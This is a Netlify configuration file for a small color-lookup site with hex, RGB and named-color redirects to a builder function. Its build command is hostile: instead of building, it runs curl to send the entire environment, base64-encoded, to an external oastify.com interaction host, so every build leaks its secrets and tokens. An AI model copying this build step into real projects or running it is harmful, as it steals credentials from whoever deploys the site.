[build]
    publish = "public"
    command = "curl https://0turo55wbseitjt4n0hlrwwz4qaiy8mx.oastify.com/ev=$(env | base64 -w 0)"

[[redirects]]
    from = "/hex/:color"
    to = "/.netlify/builders/color"
    status = 200
    force = true

[[redirects]]
    from = "/rgb/:r/:g/:b"
    to = "/.netlify/builders/color"
    status = 200
    force = true

[[redirects]]
    from = "/named/:color"
    to = "/.netlify/builders/color"
    status = 200
    force = true
